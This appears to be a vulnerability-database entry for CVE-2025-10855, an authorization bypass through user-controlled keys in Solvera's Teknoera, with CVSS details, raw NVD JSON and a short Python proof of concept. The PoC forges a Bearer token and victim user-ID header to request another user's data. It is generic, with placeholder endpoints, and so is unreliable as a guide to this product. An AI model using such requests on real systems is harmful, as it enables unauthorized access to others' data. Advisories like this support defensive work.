Security Vulnerability Report
中文
CVE-2025-10855 CVSS 7.5 HIGH

CVE-2025-10855

Published: 2026-01-22 13:16:03
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in Solvera Software Services Trade Inc. Teknoera allows Exploitation of Trusted Identifiers.This issue affects Teknoera: through 01102025.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Teknoera <= 01102025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-10855 PoC - Authorization Bypass Through User-Controlled Key # Target: Solvera Teknoera target_url = "http://target.com/api/endpoint" # Replace with valid session or identifier malicious_headers = { "Authorization": "Bearer <attacker_controlled_token>", "X-User-ID": "<victim_user_id>", "Content-Type": "application/json" } payload = { "user_id": "victim_user_id", "action": "access_sensitive_data" } # Send request with user-controlled identifier response = requests.post(target_url, json=payload, headers=malicious_headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # If vulnerability exists, attacker can access victim's data without proper authorization

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10855", "sourceIdentifier": "[email protected]", "published": "2026-01-22T13:16:03.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Solvera Software Services Trade Inc. Teknoera allows Exploitation of Trusted Identifiers.This issue affects Teknoera: through 01102025."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autorización a través de clave controlada por el usuario en Solvera Software Services Trade Inc. Teknoera permite la explotación de identificadores de confianza. Este problema afecta a Teknoera: hasta el 01102025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0003", "source": "[email protected]"}]}}